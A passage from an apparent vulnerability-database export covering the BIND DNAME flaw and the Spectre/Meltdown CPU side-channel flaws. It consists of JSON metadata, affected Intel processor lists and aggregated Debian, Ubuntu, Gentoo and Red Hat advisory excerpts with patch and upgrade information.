        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/617.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2016:2615"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/3119-1/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=49560"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/bind9/1:9.8.1.dfsg.p1-4ubuntu0.19"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/bind9/1:9.9.5.dfsg-3ubuntu0.10"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/bind9/1:9.10.3.dfsg.p4-10.1ubuntu1.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/bind9/1:9.10.3.dfsg.p4-8ubuntu1.2"
      },
      {
        "trust": 0.1,
        "url": "http://www.ubuntu.com/usn/usn-3119-1"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-9147"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-9444"
      },
      {
        "trust": 0.1,
        "url": "https://kb.isc.org/article/aa-01441"
      },
      {
        "trust": 0.1,
        "url": "https://kb.isc.org/article/aa-01439"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2017-3137"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-3137"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-9147"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-9131"
      },
      {
        "trust": 0.1,
        "url": "https://kb.isc.org/article/aa-01440"
      },
      {
        "trust": 0.1,
        "url": "https://kb.isc.org/article/aa-01466"
      },
      {
        "trust": 0.1,
        "url": "http://www.hpe.com/support/security_bulletin_archive"
      },
      {
        "trust": 0.1,
        "url": "https://www.hpe.com/info/report-security-vulnerability"
      },
      {
        "trust": 0.1,
        "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c01345499"
      },
      {
        "trust": 0.1,
        "url": "https://h20392.www2.hpe.com/portal/swdepot/displayproductinfo.do?productnumb"
      },
      {
        "trust": 0.1,
        "url": "http://www.hpe.com/support/subscriber_choice"
      },
      {
        "trust": 0.1,
        "url": "http://creativecommons.org/licenses/by-sa/2.5"
      },
      {
        "trust": 0.1,
        "url": "https://security.gentoo.org/"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-8864"
      },
      {
        "trust": 0.1,
        "url": "https://bugs.gentoo.org."
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2016-8864"
      },
      {
        "db": "BID",
        "id": "94067"
      },
      {
        "db": "PACKETSTORM",
        "id": "139496"
      },
      {
        "db": "PACKETSTORM",
        "id": "139541"
      },
      {
        "db": "PACKETSTORM",
        "id": "140046"
      },
      {
        "db": "PACKETSTORM",
        "id": "139461"
      },
      {
        "db": "PACKETSTORM",
        "id": "143169"
      },
      {
        "db": "PACKETSTORM",
        "id": "140943"
      },
      {
        "db": "PACKETSTORM",
        "id": "140436"
      },
      {
        "db": "PACKETSTORM",
        "id": "139497"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201610-898"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-005674"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8864"
      }
    ]
  },
  "sources": {
    "_id": null,
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2016-8864",
        "ident": null
      },
      {
        "db": "BID",
        "id": "94067",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "139496",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "139541",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "140046",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "139461",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "143169",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "140943",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "140436",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "139497",
        "ident": null
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201610-898",
        "ident": null
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-005674",
        "ident": null
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8864",
        "ident": null
      }
    ]
  },
  "sources_release_date": {
    "_id": null,
    "data": [
      {
        "date": "2016-11-02T00:00:00",
        "db": "VULMON",
        "id": "CVE-2016-8864",
        "ident": null
      },
      {
        "date": "2016-11-02T00:00:00",
        "db": "BID",
        "id": "94067",
        "ident": null
      },
      {
        "date": "2016-11-02T20:15:40",
        "db": "PACKETSTORM",
        "id": "139496",
        "ident": null
      },
      {
        "date": "2016-11-04T20:10:20",
        "db": "PACKETSTORM",
        "id": "139541",
        "ident": null
      },
      {
        "date": "2016-12-06T16:56:18",
        "db": "PACKETSTORM",
        "id": "140046",
        "ident": null
      },
      {
        "date": "2016-11-01T22:21:46",
        "db": "PACKETSTORM",
        "id": "139461",
        "ident": null
      },
      {
        "date": "2017-06-28T20:19:00",
        "db": "PACKETSTORM",
        "id": "143169",
        "ident": null
      },
      {
        "date": "2017-02-06T17:16:00",
        "db": "PACKETSTORM",
        "id": "140943",
        "ident": null
      },
      {
        "date": "2017-01-11T18:55:42",
        "db": "PACKETSTORM",
        "id": "140436",
        "ident": null
      },
      {
        "date": "2016-11-02T20:15:47",
        "db": "PACKETSTORM",
        "id": "139497",
        "ident": null
      },
      {
        "date": "2016-11-02T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201610-898",
        "ident": null
      },
      {
        "date": "2016-11-02T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-005674",
        "ident": null
      },
      {
        "date": "2016-11-02T17:59:00.187000",
        "db": "NVD",
        "id": "CVE-2016-8864",
        "ident": null
      }
    ]
  },
  "sources_update_date": {
    "_id": null,
    "data": [
      {
        "date": "2020-08-17T00:00:00",
        "db": "VULMON",
        "id": "CVE-2016-8864",
        "ident": null
      },
      {
        "date": "2017-05-02T03:10:00",
        "db": "BID",
        "id": "94067",
        "ident": null
      },
      {
        "date": "2020-08-18T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201610-898",
        "ident": null
      },
      {
        "date": "2016-11-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-005674",
        "ident": null
      },
      {
        "date": "2025-04-12T10:46:40.837000",
        "db": "NVD",
        "id": "CVE-2016-8864",
        "ident": null
      }
    ]
  },
  "threat_type": {
    "_id": null,
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "139496"
      },
      {
        "db": "PACKETSTORM",
        "id": "139541"
      },
      {
        "db": "PACKETSTORM",
        "id": "140046"
      },
      {
        "db": "PACKETSTORM",
        "id": "139461"
      },
      {
        "db": "PACKETSTORM",
        "id": "143169"
      },
      {
        "db": "PACKETSTORM",
        "id": "140436"
      },
      {
        "db": "PACKETSTORM",
        "id": "139497"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201610-898"
      }
    ],
    "trust": 1.3
  },
  "title": {
    "_id": null,
    "data": "ISC BIND of  DNAME Vulnerability in processing response packets containing records",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-005674"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "_id": null,
    "data": "input validation error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201610-898"
      }
    ],
    "trust": 0.6
  }
}

VAR-201801-0826

Vulnerability from variot - Updated: 2026-04-10 22:29

Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis. CPU hardware utilizing speculative execution may be vulnerable to cache timing side-channel analysis. Two vulnerabilities are identified, known as "Variant 3a" and "Variant 4". CPUhardware is a set of firmware that runs in the CPU (Central Processing Unit) for managing and controlling the CPU. The Meltdown vulnerability exists in the CPU processor core, which \"melts\" the security boundary implemented by hardware, allowing low-privileged user-level applications to \"cross-border\" access to system-level memory, causing data leakage. The following products and versions are affected: ARM Cortex-R7; Cortex-R8; Cortex-A8; Cortex-A9; Cortex-A12; Intel Xeon CPU E5-1650 v3, v2, v4 versions; Xeon E3-1265l v2, v3, v4 Version; Xeon E3-1245 v2, v3, v5, v6 versions; Xeon X7542, etc. Description:

Kernel-based Virtual Machine (KVM) is a full virtualization solution for Linux on a variety of architectures. The qemu-kvm-rhev packages provide the user-space component for running virtual machines that use KVM in environments managed by Red Hat products. Once all virtual machines have shut down, start them again for this update to take effect. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512

Debian Security Advisory DSA-4188-1 security@debian.org https://www.debian.org/security/ Salvatore Bonaccorso May 01, 2018 https://www.debian.org/security/faq

Package : linux CVE ID : CVE-2017-5715 CVE-2017-5753 CVE-2017-17975 CVE-2017-18193 CVE-2017-18216 CVE-2017-18218 CVE-2017-18222 CVE-2017-18224 CVE-2017-18241 CVE-2017-18257 CVE-2018-1065 CVE-2018-1066 CVE-2018-1068 CVE-2018-1092 CVE-2018-1093 CVE-2018-1108 CVE-2018-5803 CVE-2018-7480 CVE-2018-7566 CVE-2018-7740 CVE-2018-7757 CVE-2018-7995 CVE-2018-8087 CVE-2018-8781 CVE-2018-8822 CVE-2018-10323 CVE-2018-1000199

Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks.

CVE-2017-5715

Multiple researchers have discovered a vulnerability in various
processors supporting speculative execution, enabling an attacker
controlling an unprivileged process to read memory from arbitrary
addresses, including from the kernel and all other processes
running on the system.

This specific attack has been named Spectre variant 2 (branch
target injection) and is mitigated for the x86 architecture (amd64
and i386) by using the "retpoline" compiler feature which allows
indirect branches to be isolated from speculative execution.

CVE-2017-5753

Multiple researchers have discovered a vulnerability in various
processors supporting speculative execution, enabling an attacker
controlling an unprivileged process to read memory from arbitrary
addresses, including from the kernel and all other processes
running on the system.

This specific attack has been named Spectre variant 1
(bounds-check bypass) and is mitigated by identifying vulnerable
code sections (array bounds checking followed by array access) and
replacing the array access with the speculation-safe
array_index_nospec() function.

More use sites will be added over time.

CVE-2017-17975

Tuba Yavuz reported a use-after-free flaw in the USBTV007
audio-video grabber driver. A local user could use this for denial
of service by triggering failure of audio registration.

CVE-2017-18193

Yunlei He reported that the f2fs implementation does not properly
handle extent trees, allowing a local user to cause a denial of
service via an application with multiple threads.

CVE-2017-18216

Alex Chen reported that the OCFS2 filesystem failed to hold a
necessary lock during nodemanager sysfs file operations,
potentially leading to a null pointer dereference.  A local user
could use this for denial of service.

CVE-2017-18218

Jun He reported a user-after-free flaw in the Hisilicon HNS ethernet
driver. A local user could use this for denial of service.

CVE-2017-18222

It was reported that the Hisilicon Network Subsystem (HNS) driver
implementation does not properly handle ethtool private flags. A
local user could use this for denial of service or possibly have
other impact.

CVE-2017-18224

Alex Chen reported that the OCFS2 filesystem omits the use of a
semaphore and consequently has a race condition for access to the
extent tree during read operations in DIRECT mode. A local user
could use this for denial of service.

CVE-2017-18241

Yunlei He reported that the f2fs implementation does not properly
initialise its state if the "noflush_merge" mount option is used. 
A local user with access to a filesystem mounted with this option
could use this to cause a denial of service.

CVE-2017-18257

It was reported that the f2fs implementation is prone to an infinite
loop caused by an integer overflow in the __get_data_block()
function. A local user can use this for denial of service via
crafted use of the open and fallocate system calls with an
FS_IOC_FIEMAP ioctl.

CVE-2018-1065

The syzkaller tool found a NULL pointer dereference flaw in the
netfilter subsystem when handling certain malformed iptables
rulesets. A local user with the CAP_NET_RAW or CAP_NET_ADMIN
capability (in any user namespace) could use this to cause a denial
of service. Debian disables unprivileged user namespaces by default.

CVE-2018-1066

Dan Aloni reported to Red Hat that the CIFS client implementation
would dereference a null pointer if the server sent an invalid
response during NTLMSSP setup negotiation.  This could be used
by a malicious server for denial of service.

CVE-2018-1068

The syzkaller tool found that the 32-bit compatibility layer of
ebtables did not sufficiently validate offset values. On a 64-bit
kernel, a local user with the CAP_NET_ADMIN capability (in any user
namespace) could use this to overwrite kernel memory, possibly
leading to privilege escalation. Debian disables unprivileged user
namespaces by default.

CVE-2018-1092

Wen Xu reported that a crafted ext4 filesystem image would
trigger a null dereference when mounted.  A local user able
to mount arbitrary filesystems could use this for denial of
service.

CVE-2018-1093

Wen Xu reported that a crafted ext4 filesystem image could trigger
an out-of-bounds read in the ext4_valid_block_bitmap() function. A
local user able to mount arbitrary filesystems could use this for
denial of service.

CVE-2018-1108

Jann Horn reported that crng_ready() does not properly handle the
crng_init variable states and the RNG could be treated as
cryptographically safe too early after system boot.

CVE-2018-5803

Alexey Kodanev reported that the SCTP protocol did not range-check
the length of chunks to be created.  A local or remote user could
use this to cause a denial of service.

CVE-2018-7480

Hou Tao discovered a double-free flaw in the blkcg_init_queue()
function in block/blk-cgroup.c. A local user could use this to cause
a denial of service or have other impact.

CVE-2018-7566

Fan LongFei reported a race condition in the ALSA (sound)
sequencer core, between write and ioctl operations.  This could
lead to an out-of-bounds access or use-after-free.  A local user
with access to a sequencer device could use this for denial of
service or possibly for privilege escalation.

CVE-2018-7740

Nic Losby reported that the hugetlbfs filesystem's mmap operation
did not properly range-check the file offset.  A local user with
access to files on a hugetlbfs filesystem could use this to cause
a denial of service.

CVE-2018-7757

Jason Yan reported a memory leak in the SAS (Serial-Attached
SCSI) subsystem.  A local user on a system with SAS devices
could use this to cause a denial of service.

CVE-2018-7995

Seunghun Han reported a race condition in the x86 MCE
(Machine Check Exception) driver.  This is unlikely to have
any security impact.

CVE-2018-8087

A memory leak flaw was found in the hwsim_new_radio_nl() function in
the simulated radio testing tool driver for mac80211, allowing a
local user to cause a denial of service.

CVE-2018-8781

Eyal Itkin reported that the udl (DisplayLink) driver's mmap
operation did not properly range-check the file offset.  A local
user with access to a udl framebuffer device could exploit this to
overwrite kernel memory, leading to privilege escalation.

CVE-2018-8822

Dr Silvio Cesare of InfoSect reported that the ncpfs client
implementation did not validate reply lengths from the server.  An
ncpfs server could use this to cause a denial of service or
remote code execution in the client.

CVE-2018-10323

Wen Xu reported a NULL pointer dereference flaw in the
xfs_bmapi_write() function triggered when mounting and operating a
crafted xfs filesystem image. A local user able to mount arbitrary
filesystems could use this for denial of service.

CVE-2018-1000199

Andy Lutomirski discovered that the ptrace subsystem did not
sufficiently validate hardware breakpoint settings.  Local users
can use this to cause a denial of service, or possibly for
privilege escalation, on x86 (amd64 and i386) and possibly other
architectures.

For the stable distribution (stretch), these problems have been fixed in version 4.9.88-1.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to its security tracker page at: https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAlron7dfFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2 NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND z0Se0xAAmR31jrqeEkJhgh7qvKplrko9N27l7FCCrrqsR0cBjKtIpwBkIdm6UxP2 8HBxqK5oy3sUP/ViHBtTUqFlRbLq4fC2DsuJGGqtBk46yML4QOEV2CXA1gyhfSzG ux5Z5nNkLDbzD7jPazbTwMusbQrDItojj6K5aoDVoRjjOpRHRViHv81kRU3KJytX 62f/vnEjxX0xkSOqLKXcUNDczLjcP2VxuKFb3si6w7YyCXq6XYhvoDch92QLJZfD qtDUCKs1sEgWLzhktcYyhck3NGujSfLZuSLGnZowqGqaAvx/lq0sTOliKuPpnG+I HztPR0iYQCuzsDgHbLlwGyuUnf446VRG+u/AP69qk0HqyWwCXqsTJ0rwMX04fXtR 7dR8Y1jbbXaH0+ai9V6c3zdz4UKH5rZOkpIIYSjCxVHUpE2cU4lFXYiWL/qJRBGV 150TtSgyAPBBBJa6cWgApXrHgriGEkZNscH2nmJfg2OBnDwnLJ4CvwNfij7daR8n RlGOlvgKYCI1Ob54kKqvvxQhDrhTiBhti8T64wd2MzsrKLIRdlyTpSrsqK8VIJyg ux1Y01sgA3JqS2XKL52ZTgCJhGkoX68+/se73P+jeRBP/tbNcXB2t2cE6gxIkiTX eZEUmnS5IeoEcr7cYKm3M9GZvBBrVeTaFra3vSgeGDUr0XL2Yu4= =uZGQ -----END PGP SIGNATURE----- . 6) - i386, x86_64

Description:

The microcode_ctl packages provide microcode updates for Intel and AMD processors. Ubuntu users with a processor from a different vendor should contact the vendor to identify necessary firmware updates. Ubuntu will provide corresponding QEMU updates in the future for users of self-hosted virtual environments in coordination with upstream QEMU. Ubuntu users in cloud environments should contact the cloud provider to confirm that the hypervisor has been updated to expose the new CPU features to virtual machines. 6.7) - x86_64

Description:

The libvirt library contains a C API for managing and interacting with the virtualization capabilities of Linux and other operating systems. In addition, libvirt provides tools for remote management of virtualized systems. (CVE-2017-5715)

Note: This is the libvirt side of the CVE-2017-5715 mitigation.

This specific attack has been named Meltdown and is addressed in the
Linux kernel on the powerpc/ppc64el architectures by flushing the L1
data cache on exit from kernel mode to user mode (or from hypervisor to
kernel).

This works on Power7, Power8 and Power9 processors. Memory protections ensuring user-provided buffers always
point to userland memory were disabled, allowing . The
acpi_smbus_hc_add() prints a kernel address in the kernel log at every
boot, which could be used by an attacker on the system to defeat kernel
ASLR.

Additionnaly to those vulnerability, some mitigations for CVE-2017-5753 are included in this release. ========================================================================== Ubuntu Security Notice USN-3620-2 April 05, 2018

linux-lts-trusty vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

Ubuntu 12.04 ESM

Summary:

Several security issues were fixed in the Linux kernel. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 14.04 LTS for Ubuntu 12.04 ESM. This flaw is known as Spectre. (CVE-2017-5715)

It was discovered that the netlink 802.11 configuration interface in the Linux kernel did not properly validate some attributes passed from userspace. (CVE-2017-11089)

It was discovered that a buffer overflow existed in the ioctl handling code in the ISDN subsystem of the Linux kernel. (CVE-2017-12762)

It was discovered that the netfilter component of the Linux did not properly restrict access to the connection tracking helpers list. (CVE-2017-17448)

Dmitry Vyukov discovered that the KVM implementation in the Linux kernel contained an out-of-bounds read when handling memory-mapped I/O. (CVE-2017-17741)

It was discovered that the Salsa20 encryption algorithm implementations in the Linux kernel did not properly handle zero-length inputs. (CVE-2017-17805)

It was discovered that the keyring implementation in the Linux kernel did not properly check permissions when a key request was performed on a task's default keyring. A local attacker could use this to add keys to unauthorized keyrings. (CVE-2017-17807)

It was discovered that the Broadcom NetXtremeII ethernet driver in the Linux kernel did not properly validate Generic Segment Offload (GSO) packet sizes. (CVE-2018-1000026)

It was discovered that the Reliable Datagram Socket (RDS) implementation in the Linux kernel contained an out-of-bounds write during RDMA page allocation.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well.

Background

Xen is a bare-metal hypervisor.

Affected packages

-------------------------------------------------------------------
 Package              /     Vulnerable     /            Unaffected
-------------------------------------------------------------------

1 app-emulation/xen < 4.10.1-r2 >= 4.10.1-r2 2 app-emulation/xen-tools < 4.10.1-r2 >= 4.10.1-r2 ------------------------------------------------------------------- 2 affected packages

Description

Multiple vulnerabilities have been discovered in Xen. Please review the referenced CVE identifiers for details.

Workaround

There is no known workaround at this time.

Resolution

All Xen users should upgrade to the latest version:

# emerge --sync # emerge --ask --oneshot --verbose ">=app-emulation/xen-4.10.1-r2"

All Xen tools users should upgrade to the latest version:

# emerge --sync # emerge --ask --oneshot -v ">=app-emulation/xen-tools-4.10.1-r2"

References

[ 1 ] CVE-2017-5715 https://nvd.nist.gov/vuln/detail/CVE-2017-5715 [ 2 ] CVE-2017-5753 https://nvd.nist.gov/vuln/detail/CVE-2017-5753 [ 3 ] CVE-2017-5754 https://nvd.nist.gov/vuln/detail/CVE-2017-5754 [ 4 ] CVE-2018-10471 https://nvd.nist.gov/vuln/detail/CVE-2018-10471 [ 5 ] CVE-2018-10472 https://nvd.nist.gov/vuln/detail/CVE-2018-10472 [ 6 ] CVE-2018-10981 https://nvd.nist.gov/vuln/detail/CVE-2018-10981 [ 7 ] CVE-2018-10982 https://nvd.nist.gov/vuln/detail/CVE-2018-10982 [ 8 ] CVE-2018-12891 https://nvd.nist.gov/vuln/detail/CVE-2018-12891 [ 9 ] CVE-2018-12892 https://nvd.nist.gov/vuln/detail/CVE-2018-12892 [ 10 ] CVE-2018-12893 https://nvd.nist.gov/vuln/detail/CVE-2018-12893 [ 11 ] CVE-2018-15468 https://nvd.nist.gov/vuln/detail/CVE-2018-15468 [ 12 ] CVE-2018-15469 https://nvd.nist.gov/vuln/detail/CVE-2018-15469 [ 13 ] CVE-2018-15470 https://nvd.nist.gov/vuln/detail/CVE-2018-15470 [ 14 ] CVE-2018-3620 https://nvd.nist.gov/vuln/detail/CVE-2018-3620 [ 15 ] CVE-2018-3646 https://nvd.nist.gov/vuln/detail/CVE-2018-3646 [ 16 ] CVE-2018-5244 https://nvd.nist.gov/vuln/detail/CVE-2018-5244 [ 17 ] CVE-2018-7540 https://nvd.nist.gov/vuln/detail/CVE-2018-7540 [ 18 ] CVE-2018-7541 https://nvd.nist.gov/vuln/detail/CVE-2018-7541 [ 19 ] CVE-2018-7542 https://nvd.nist.gov/vuln/detail/CVE-2018-7542

Availability

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

https://security.gentoo.org/glsa/201810-06

Concerns?

License

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5 . Summary:

An update for kernel is now available for Red Hat Enterprise Linux 7.2 Advanced Update Support, Red Hat Enterprise Linux 7.2 Telco Extended Update Support, and Red Hat Enterprise Linux 7.2 Update Services for SAP Solutions.

Relevant releases/architectures:

Red Hat Enterprise Linux Server AUS (v. 7.2) - noarch, x86_64 Red Hat Enterprise Linux Server E4S (v. 7.2) - noarch, x86_64 Red Hat Enterprise Linux Server TUS (v. 7.2) - noarch, x86_64

Security Fix(es):

In this update mitigations for x86-64 architecture are provided.

Note: CVE-2017-5754 affects Intel x86-64 microprocessors. AMD x86-64 microprocessors are not affected by this issue.

Red Hat would like to thank Google Project Zero for reporting these issues.

Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

Bugs fixed (https://bugzilla.redhat.com/):

Package List:

Red Hat Enterprise Linux Server AUS (v. 7.2):

Source: kernel-3.10.0-327.62.4.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-327.62.4.el7.noarch.rpm kernel-doc-3.10.0-327.62.4.el7.noarch.rpm

x86_64: kernel-3.10.0-327.62.4.el7.x86_64.rpm kernel-debug-3.10.0-327.62.4.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-327.62.4.el7.x86_64.rpm kernel-debug-devel-3.10.0-327.62.4.el7.x86_64.rpm kernel-debuginfo-3.10.0-327.62.4.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-327.62.4.el7.x86_64.rpm kernel-devel-3.10.0-327.62.4.el7.x86_64.rpm kernel-headers-3.10.0-327.62.4.el7.x86_64.rpm kernel-tools-3.10.0-327.62.4.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-327.62.4.el7.x86_64.rpm kernel-tools-libs-3.10.0-327.62.4.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-327.62.4.el7.x86_64.rpm perf-3.10.0-327.62.4.el7.x86_64.rpm perf-debuginfo-3.10.0-327.62.4.el7.x86_64.rpm python-perf-3.10.0-327.62.4.el7.x86_64.rpm python-perf-debuginfo-3.10.0-327.62.4.el7.x86_64.rpm

Red Hat Enterprise Linux Server E4S (v. 7.2):

Source: kernel-3.10.0-327.62.4.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-327.62.4.el7.noarch.rpm kernel-doc-3.10.0-327.62.4.el7.noarch.rpm

Red Hat Enterprise Linux Server TUS (v. 7.2):

Source: kernel-3.10.0-327.62.4.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-327.62.4.el7.noarch.rpm kernel-doc-3.10.0-327.62.4.el7.noarch.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

References:

Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

iD4DBQFaTWPzXlSAg2UNWIIRAoXpAKCk1PNZ0v5ibBlDz1In1VOoIBh5kgCXda5D oQnItcyXxYD6V03BxY+DbA== =jaFN -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce

Show details on source website

JSON

To clipboard

{
  "affected_products": {
    "_id": null,
    "data": [
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x7550"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4350"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4690t"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6442eq"
      },
      {
        "_id": null,
        "model": "core m",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5y31"
      },
      {
        "_id": null,
        "model": "xeon e5 1620",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "lc5528"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "640um"
      },
      {
        "_id": null,
        "model": "xeon e3 1285 v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4850_v2"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4302y"
      },
      {
        "_id": null,
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2807"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x3480"
      },
      {
        "_id": null,
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8164"
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3530"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2367m"
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3460"
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z2460"
      },
      {
        "_id": null,
        "model": "xeon e3 1240 v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3427u"
      },
      {
        "_id": null,
        "model": "celeron j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j4105"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2687w_v2"
      },
      {
        "_id": null,
        "model": "xeon silver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4110"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3520m"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6102e"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6100e"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5570"
      },
      {
        "_id": null,
        "model": "xeon e3 1275 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e3 1285l v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4667_v3"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3217u"
      },
      {
        "_id": null,
        "model": "xeon e5 2637 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "celeron n",
